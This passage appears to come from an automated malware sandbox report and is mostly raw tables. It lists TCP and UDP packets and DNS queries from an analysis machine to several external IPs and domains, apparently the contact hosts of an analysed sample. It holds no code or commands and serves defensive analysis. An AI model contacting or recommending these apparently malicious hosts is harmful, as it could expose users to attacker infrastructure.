                                                                      Nov 28, 2024 10:06:17.844805002 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.844855070 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.846528053 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.846600056 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.846637011 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.846695900 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.848330975 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.848371029 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.848453045 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.848526001 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.849818945 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.849872112 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.849925041 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.849984884 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.851428986 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.851471901 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.851511955 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.851555109 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.853060961 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.853121042 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.938303947 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.938388109 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.938401937 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.938427925 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.939143896 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.939202070 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.939240932 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.939284086 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.940849066 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.940901041 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.940948009 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.940992117 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.942532063 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.942605019 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.942632914 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.942683935 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.944180012 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.944243908 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.944283009 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.944322109 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.945852995 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.945897102 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.945919037 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.945952892 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.947619915 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.947669983 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.947787046 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.947833061 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.949214935 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.949259996 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.949301958 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.949372053 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.950884104 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.950947046 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.950949907 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.950988054 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.952594995 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.952661037 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.952809095 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.952847958 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.954229116 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.954329967 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.954376936 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.954420090 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.955926895 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.955977917 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.956139088 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.956208944 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.957540989 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.957638025 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.957640886 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.957672119 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.959233046 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.959283113 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.959342003 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.959377050 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.960925102 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.960966110 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.961029053 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.961081982 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.962579012 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.962622881 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.962668896 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.962718964 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.964293957 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.964335918 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.964389086 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.964437008 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:17.965893030 CET8049724212.162.149.63192.168.2.6
                                                                      Nov 28, 2024 10:06:17.965990067 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:33.401448011 CET4972480192.168.2.6212.162.149.63
                                                                      Nov 28, 2024 10:06:45.015238047 CET4972580192.168.2.6165.22.38.185
                                                                      Nov 28, 2024 10:06:45.135457039 CET8049725165.22.38.185192.168.2.6
                                                                      Nov 28, 2024 10:06:45.135704994 CET4972580192.168.2.6165.22.38.185
                                                                      Nov 28, 2024 10:06:45.145488977 CET4972580192.168.2.6165.22.38.185
                                                                      Nov 28, 2024 10:06:45.265420914 CET8049725165.22.38.185192.168.2.6
                                                                      Nov 28, 2024 10:06:46.268918991 CET8049725165.22.38.185192.168.2.6
                                                                      Nov 28, 2024 10:06:46.268939972 CET8049725165.22.38.185192.168.2.6
                                                                      Nov 28, 2024 10:06:46.269125938 CET4972580192.168.2.6165.22.38.185
                                                                      Nov 28, 2024 10:06:46.277213097 CET4972580192.168.2.6165.22.38.185
                                                                      Nov 28, 2024 10:06:46.397274017 CET8049725165.22.38.185192.168.2.6
                                                                      Nov 28, 2024 10:07:01.985235929 CET4972680192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:02.105439901 CET8049726154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:02.105566025 CET4972680192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:02.120712996 CET4972680192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:02.240648985 CET8049726154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:03.636385918 CET4972680192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:03.718035936 CET8049726154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:03.718158960 CET4972680192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:03.718377113 CET8049726154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:03.718444109 CET4972680192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:03.756351948 CET8049726154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:03.756479025 CET4972680192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:04.655124903 CET4972780192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:04.775182009 CET8049727154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:04.775429964 CET4972780192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:04.790400028 CET4972780192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:04.910409927 CET8049727154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:06.293028116 CET4972780192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:06.378921032 CET8049727154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:06.378974915 CET8049727154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:06.379002094 CET4972780192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:06.379024982 CET4972780192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:06.412998915 CET8049727154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:06.413057089 CET4972780192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:07.311387062 CET4972880192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:07.431333065 CET8049728154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:07.431667089 CET4972880192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:07.447206974 CET4972880192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:07.567157984 CET8049728154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:07.567198038 CET8049728154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:09.013612986 CET4972880192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:09.134093046 CET8049728154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:09.134170055 CET4972880192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:10.031573057 CET4972980192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:10.151735067 CET8049729154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:10.152059078 CET4972980192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:10.161540985 CET4972980192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:10.281631947 CET8049729154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:11.716651917 CET8049729154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:11.716698885 CET8049729154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:11.716881990 CET4972980192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:11.766463995 CET4972980192.168.2.6154.88.22.104
                                                                      Nov 28, 2024 10:07:11.886377096 CET8049729154.88.22.104192.168.2.6
                                                                      Nov 28, 2024 10:07:17.202069998 CET4973080192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:17.322181940 CET804973069.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:17.322501898 CET4973080192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:17.337074995 CET4973080192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:17.457174063 CET804973069.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:18.631484032 CET804973069.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:18.631679058 CET804973069.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:18.631747007 CET4973080192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:18.839632034 CET4973080192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:19.863895893 CET4973180192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:19.984100103 CET804973169.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:19.984267950 CET4973180192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:20.010006905 CET4973180192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:20.130487919 CET804973169.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:21.216412067 CET804973169.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:21.216470957 CET804973169.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:21.216526985 CET4973180192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:21.511544943 CET4973180192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:22.531281948 CET4973280192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:22.651274920 CET804973269.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:22.651432037 CET4973280192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:22.666096926 CET4973280192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:22.786178112 CET804973269.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:22.786199093 CET804973269.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:23.880187035 CET804973269.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:23.880213976 CET804973269.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:23.880317926 CET4973280192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:24.167860031 CET4973280192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:25.186372042 CET4973380192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:25.306400061 CET804973369.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:25.308343887 CET4973380192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:25.318721056 CET4973380192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:25.438885927 CET804973369.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:26.583642960 CET804973369.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:26.583736897 CET804973369.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:26.583827972 CET4973380192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:26.643471003 CET4973380192.168.2.669.57.163.64
                                                                      Nov 28, 2024 10:07:26.763842106 CET804973369.57.163.64192.168.2.6
                                                                      Nov 28, 2024 10:07:32.026300907 CET4973480192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:32.146719933 CET8049734104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:32.146852970 CET4973480192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:32.193804979 CET4973480192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:32.313926935 CET8049734104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:33.493359089 CET8049734104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:33.494087934 CET8049734104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:33.494107008 CET8049734104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:33.494131088 CET4973480192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:33.494158983 CET4973480192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:33.698841095 CET4973480192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:34.791877985 CET4973580192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:34.911948919 CET8049735104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:34.912043095 CET4973580192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:34.998898029 CET4973580192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:35.119110107 CET8049735104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:36.272105932 CET8049735104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:36.272308111 CET8049735104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:36.272382975 CET4973580192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:36.511533022 CET4973580192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:37.531639099 CET4973680192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:37.651894093 CET8049736104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:37.652014017 CET4973680192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:37.672563076 CET4973680192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:37.792747021 CET8049736104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:37.792785883 CET8049736104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:39.044641972 CET8049736104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:39.044853926 CET8049736104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:39.044891119 CET8049736104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:39.044924974 CET4973680192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:39.044966936 CET4973680192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:39.183191061 CET4973680192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:40.201849937 CET4973780192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:40.321916103 CET8049737104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:40.322020054 CET4973780192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:40.332139969 CET4973780192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:40.452075958 CET8049737104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:41.779943943 CET8049737104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:41.780822039 CET8049737104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:41.784656048 CET4973780192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:41.788547039 CET4973780192.168.2.6104.21.6.17
                                                                      Nov 28, 2024 10:07:41.908775091 CET8049737104.21.6.17192.168.2.6
                                                                      Nov 28, 2024 10:07:47.267066002 CET4973880192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:47.387145996 CET80497383.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:47.387234926 CET4973880192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:47.409003019 CET4973880192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:47.528956890 CET80497383.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:48.917660952 CET4973880192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:48.931809902 CET80497383.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:48.931824923 CET80497383.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:48.931869030 CET4973880192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:48.931898117 CET4973880192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:49.037970066 CET80497383.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:49.038028955 CET4973880192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:49.938680887 CET4973980192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:50.058917999 CET80497393.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:50.062652111 CET4973980192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:50.076766968 CET4973980192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:50.196979046 CET80497393.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:51.489156961 CET80497393.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:51.489181042 CET80497393.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:51.489198923 CET80497393.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:51.489216089 CET80497393.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:51.489228964 CET4973980192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:51.489273071 CET4973980192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:51.589493990 CET4973980192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:52.608073950 CET4974080192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:52.728425026 CET80497403.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:52.728513002 CET4974080192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:52.744823933 CET4974080192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:52.864898920 CET80497403.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:52.864932060 CET80497403.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:54.136221886 CET80497403.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:54.136240959 CET80497403.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:54.136253119 CET80497403.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:54.136266947 CET80497403.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:54.136331081 CET4974080192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:54.136420012 CET4974080192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:54.264540911 CET4974080192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:55.280427933 CET4974180192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:55.400557041 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:55.400758028 CET4974180192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:55.409780025 CET4974180192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:55.529776096 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:56.785020113 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:56.785041094 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:56.785056114 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:56.785069942 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:07:56.785214901 CET4974180192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:56.791304111 CET4974180192.168.2.63.75.10.80
                                                                      Nov 28, 2024 10:07:56.911431074 CET80497413.75.10.80192.168.2.6
                                                                      Nov 28, 2024 10:08:02.877522945 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:02.997661114 CET8049742103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:02.997750998 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:03.013453960 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:03.133552074 CET8049742103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:04.526932001 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:04.647382975 CET8049742103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:04.648797035 CET4974280192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.546375990 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.666608095 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:05.666841030 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.681632042 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:05.801721096 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:06.770634890 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:06.770762920 CET8049743103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:06.770859957 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:07.261542082 CET4974380192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.285813093 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.405884981 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:08.406054020 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.423368931 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:08.543442011 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:08.543468952 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:09.552851915 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:09.553082943 CET8049744103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:09.553131104 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:09.933254957 CET4974480192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:10.952585936 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:11.072696924 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:11.072776079 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:11.082936049 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:11.203006029 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:12.231089115 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:12.231125116 CET8049745103.168.172.37192.168.2.6
                                                                      Nov 28, 2024 10:08:12.232707024 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:12.236540079 CET4974580192.168.2.6103.168.172.37
                                                                      Nov 28, 2024 10:08:12.356520891 CET8049745103.168.172.37192.168.2.6

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 28, 2024 10:06:44.401035070 CET6381353192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:06:45.008178949 CET53638131.1.1.1192.168.2.6
                                                                      Nov 28, 2024 10:07:01.327617884 CET5980353192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:07:01.981430054 CET53598031.1.1.1192.168.2.6
                                                                      Nov 28, 2024 10:07:16.781925917 CET5481353192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:07:17.198312044 CET53548131.1.1.1192.168.2.6
                                                                      Nov 28, 2024 10:07:31.656219006 CET5557653192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:07:32.000127077 CET53555761.1.1.1192.168.2.6
                                                                      Nov 28, 2024 10:07:46.796545029 CET6505853192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:07:47.263221979 CET53650581.1.1.1192.168.2.6
                                                                      Nov 28, 2024 10:08:01.796549082 CET5624953192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:08:02.792721987 CET5624953192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:08:02.874437094 CET53562491.1.1.1192.168.2.6
                                                                      Nov 28, 2024 10:08:02.930182934 CET53562491.1.1.1192.168.2.6
                                                                      Nov 28, 2024 10:08:17.249871969 CET6449053192.168.2.61.1.1.1
                                                                      Nov 28, 2024 10:08:17.834805965 CET53644901.1.1.1192.168.2.6

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 28, 2024 10:06:44.401035070 CET192.168.2.61.1.1.10x4665Standard query (0)www.carhireheaven.onlineA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:01.327617884 CET192.168.2.61.1.1.10xedeStandard query (0)www.dy01urj.proA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:16.781925917 CET192.168.2.61.1.1.10xa8f1Standard query (0)www.openhorizons.proA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:31.656219006 CET192.168.2.61.1.1.10x2064Standard query (0)www.topkapiescortg.xyzA (IP address)IN (0x0001)false
